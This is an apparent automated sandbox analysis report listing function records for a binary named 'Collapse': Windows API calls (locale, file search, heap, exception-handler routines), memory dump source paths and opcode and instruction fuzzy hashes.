                                                                                                        • Opcode Fuzzy Hash: 8d2a791450e1565046fcd4e737bdad2c01cef58116e918cc1312b5375f11043b
                                                                                                        • Instruction Fuzzy Hash: AEB16071510608DFD715CF28C48AB657BE0FF86365F298658E8D9CF2A1C375E991CB80
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0098E0AA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 2325560087-0
                                                                                                        • Opcode ID: 58ccffe0e5053e26d930d14bc7746d104e6e60b1d3f7ba5635884c7b0e830723
                                                                                                        • Instruction ID: a8580fe01d8f521736211fdb87b9ccc1bef38b73ac0368b5019f32b558e821db
                                                                                                        • Opcode Fuzzy Hash: 58ccffe0e5053e26d930d14bc7746d104e6e60b1d3f7ba5635884c7b0e830723
                                                                                                        • Instruction Fuzzy Hash: 11A1A1B1D286058FDB18CF58E9956ADBBF5FB88324F24822ED451EB390D338A844CF50
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099C0E0: HeapAlloc.KERNEL32(00000008,?,?,?,0099B000,00000001,00000364,?,00000005,000000FF,?,0099495A,009B56B0,0000000C), ref: 0099C121
                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A0E99
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 009A0F8D
                                                                                                        • FindClose.KERNEL32(00000000), ref: 009A0FCC
                                                                                                        • FindClose.KERNEL32(00000000), ref: 009A0FFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 2701053895-0
                                                                                                        • Opcode ID: dad131455efb52aad1134851c5be4e5fceaff44e375c3fffa4f62c7538280230
                                                                                                        • Instruction ID: ef791eae7fa4830346353ee9cb60bc3e1454d1ccad3edb2360e218056fe49194
                                                                                                        • Opcode Fuzzy Hash: dad131455efb52aad1134851c5be4e5fceaff44e375c3fffa4f62c7538280230
                                                                                                        • Instruction Fuzzy Hash: A5515672900218AFDF24AF6C9C85ABE7BBDDFC6314F24419DF85997241EA309D419BA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 0-4108050209
                                                                                                        • Opcode ID: 0d8e04bbd53f00733da20fab5595d61b21d8e1911b63210171d42a0853bbb0dd
                                                                                                        • Instruction ID: a10682391c879064eb5330b18b89098584debdd15b7841a73bf424c70963db89
                                                                                                        • Opcode Fuzzy Hash: 0d8e04bbd53f00733da20fab5595d61b21d8e1911b63210171d42a0853bbb0dd
                                                                                                        • Instruction Fuzzy Hash: CCC1E1349047068FEF3ACF6CC584A7ABBB9EF65300F148A1DE55697691C331AE86CB11
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009A0654
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 3736152602-0
                                                                                                        • Opcode ID: 2a7eafb56fcfe39e29dcb4f67d68eb31d93d6e70641854c695d32bac7a4454cf
                                                                                                        • Instruction ID: 56263ccf9948c9b08de2769d5958341b1f3da372fce409a6ec14109279c8411a
                                                                                                        • Opcode Fuzzy Hash: 2a7eafb56fcfe39e29dcb4f67d68eb31d93d6e70641854c695d32bac7a4454cf
                                                                                                        • Instruction Fuzzy Hash: 3A21F572655206ABDF28AB28DD45B7A77ACEFC6314B14017AFD05C6241EB35ED108B90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 0-4108050209
                                                                                                        • Opcode ID: 809a9b10de240f48ac40a011f498f7823f22a89fe2a9d6c100d76fa1704410d4
                                                                                                        • Instruction ID: ad32e7a26d2fb66354595e5cb96c083c75039e6307f3641d208f97531889496a
                                                                                                        • Opcode Fuzzy Hash: 809a9b10de240f48ac40a011f498f7823f22a89fe2a9d6c100d76fa1704410d4
                                                                                                        • Instruction Fuzzy Hash: 58B1F23090460BABCF28CF6CC9957BEB7F9AF46310F140A1DE89297691D734AE41CB51
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • EnumSystemLocalesW.KERNEL32(009A034E,00000001,00000000,?,-00000050,?,009A013E,00000000,-00000002,00000000,?,00000055,?), ref: 009A0325
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: bc33d1e595825256efc5b6691a73ff7ccae6e8620ba28933c6c3dbb1b46227af
                                                                                                        • Instruction ID: 0d4ac04a06ef7e041de09d4625a84ab8bd1eca8c2eddde85f28a9cd1ec24d4d5
                                                                                                        • Opcode Fuzzy Hash: bc33d1e595825256efc5b6691a73ff7ccae6e8620ba28933c6c3dbb1b46227af
                                                                                                        • Instruction Fuzzy Hash: 971129362043055FDF189F39C89167ABB95FFC0359B14442DE94B87B40D7716842CB80
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009A0774
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 3736152602-0
                                                                                                        • Opcode ID: 316f9551bf6291dfa189078de7b5e8c00bb2d84a324f6baa6a1a1f572ba87ce9
                                                                                                        • Instruction ID: 5993ab328d961ff739d2bc65dc56257f2122ca4bce4d695afc14d4da8454a727
                                                                                                        • Opcode Fuzzy Hash: 316f9551bf6291dfa189078de7b5e8c00bb2d84a324f6baa6a1a1f572ba87ce9
                                                                                                        • Instruction Fuzzy Hash: DB11E572654216ABDB14EF28DD46ABA77ECEF85320B14017AF905D7241EB38FD049BD0
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,009A056A,00000000,00000000,?), ref: 009A08F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 3736152602-0
                                                                                                        • Opcode ID: c6768faeb68e3c9273ca6111baf8c54caf2be31966fff86f9181ed2874dded95
                                                                                                        • Instruction ID: 57f00de1c269ffa6157ab682381f4c3852a5736ce5fb7cac9ed50e2cf53e7892
                                                                                                        • Opcode Fuzzy Hash: c6768faeb68e3c9273ca6111baf8c54caf2be31966fff86f9181ed2874dded95
                                                                                                        • Instruction Fuzzy Hash: 5201F933610112BBEF285B248C55BBB776CDBC1354F16442DEC46A3181EA74FE41DAD1
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • EnumSystemLocalesW.KERNEL32(009A0600,00000001,?,?,-00000050,?,009A0106,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 009A05EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: 2b3b2724cb99f65c75004d1bf234fa920ea0d4f03caeca15112e190d73b3e2e8
                                                                                                        • Instruction ID: 637c881ea64669164c0e8620b2285fabcfb836665d60b614df44a1b8d413b8b7
                                                                                                        • Opcode Fuzzy Hash: 2b3b2724cb99f65c75004d1bf234fa920ea0d4f03caeca15112e190d73b3e2e8
                                                                                                        • Instruction Fuzzy Hash: DDF0F6366043045FEB245F39D881B7A7B95EFC2368F05452DF9464B690D6B1AC02DA90
                                                                                                        APIs
                                                                                                          • Part of subcall function 00997594: EnterCriticalSection.KERNEL32(?,?,0099B440,?,009B5B00,00000008,0099B332,?,?,?), ref: 009975A3
                                                                                                        • EnumSystemLocalesW.KERNEL32(0099BFE3,00000001,009B5B80,0000000C,0099B948,-00000050), ref: 0099C028
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 2b5904c48c5df79e78de4b2d674fb7f2eafc37648dd3f236cc16d50118ccbcf3
                                                                                                        • Instruction ID: fbd3fff666fd863942b679830fbee418f85119f58232863bd4183df63598f22a
                                                                                                        • Opcode Fuzzy Hash: 2b5904c48c5df79e78de4b2d674fb7f2eafc37648dd3f236cc16d50118ccbcf3
                                                                                                        • Instruction Fuzzy Hash: D8F03772A64204DFEB00EF98E902B9E77A0EB88725F10421AF4109B2A0DB795900DF40
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • EnumSystemLocalesW.KERNEL32(009A0720,00000001,?,?,?,009A0160,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 009A070C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: 32db32dabba1dcb48f4d90d04aa943a8b9aa9cecfe62c3a109f3bc90f3f573a7
                                                                                                        • Instruction ID: c52ceb85379935f5116397e20a24b6fad02f17c7f3361f60180d2cb01f0c77f5
                                                                                                        • Opcode Fuzzy Hash: 32db32dabba1dcb48f4d90d04aa943a8b9aa9cecfe62c3a109f3bc90f3f573a7
                                                                                                        • Instruction Fuzzy Hash: E7F0E53A34020557CB149F39DD4576BBFA4EFC2764B0B4059FA098B691D671A842DBD0
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,009962F0,?,20001004,00000000,00000002,?,?,00995202), ref: 0099BA80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 2e45fa1aab97bd06a066438b9dc97057f32658f7d75d96cef11fe605be59b08c
                                                                                                        • Instruction ID: 8757ce4705bcff621a1e9775512e1c4085f9d142c21adc745f44e607b7784cdb
                                                                                                        • Opcode Fuzzy Hash: 2e45fa1aab97bd06a066438b9dc97057f32658f7d75d96cef11fe605be59b08c
                                                                                                        • Instruction Fuzzy Hash: 56E04F32949128BBDF126F65EE08EAE3F69EF44761F014110FD0665161CB398921BAD4
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000E541), ref: 0098E425
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 564cca038b657885fda63f76dd3b8295db6e275ef36eb74e2e282b5cead4b9c2
                                                                                                        • Instruction ID: 3ee8bf79213abd744b2321b1a02a949b332c0aa82c0846551684a32f2d1ac817
                                                                                                        • Opcode Fuzzy Hash: 564cca038b657885fda63f76dd3b8295db6e275ef36eb74e2e282b5cead4b9c2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: 445abcc29f4a1d138312d0c7bd2b48d9896209882f5a23a1961476ec9947b4d8
                                                                                                        • Instruction ID: 8a6401ff97aec6bb410106d2821aeefe3421851004fbc816c2ec679e8cdac1ca
                                                                                                        • Opcode Fuzzy Hash: 445abcc29f4a1d138312d0c7bd2b48d9896209882f5a23a1961476ec9947b4d8
                                                                                                        • Instruction Fuzzy Hash: 86A011302282008B83008F32AB0820A3BECAA08AA83088A28A008C0020EA208000BF00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b4363962fa0c7b0cb12200ee22251e4dad4e7f846aac70464cfda6dfe550e683
                                                                                                        • Instruction ID: 3146003af1d7935e24a2af84aa4d3081594386ec0d9d2bdf3199bcb9ac278045
                                                                                                        • Opcode Fuzzy Hash: b4363962fa0c7b0cb12200ee22251e4dad4e7f846aac70464cfda6dfe550e683
                                                                                                        • Instruction Fuzzy Hash: 68519BB0D1020D9FCB44EFA8C591AEEBBF4BB49350F24545AE415FB350D734AA42CB65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d9d62a96dc4bd0b66bf885da68b09de0552910a9b6002276b405ba0b61ee9706
                                                                                                        • Instruction ID: 6db90d7fc8765c34617e34a78d25556063ae0ce123cd4d69a871f5e09c0075d0
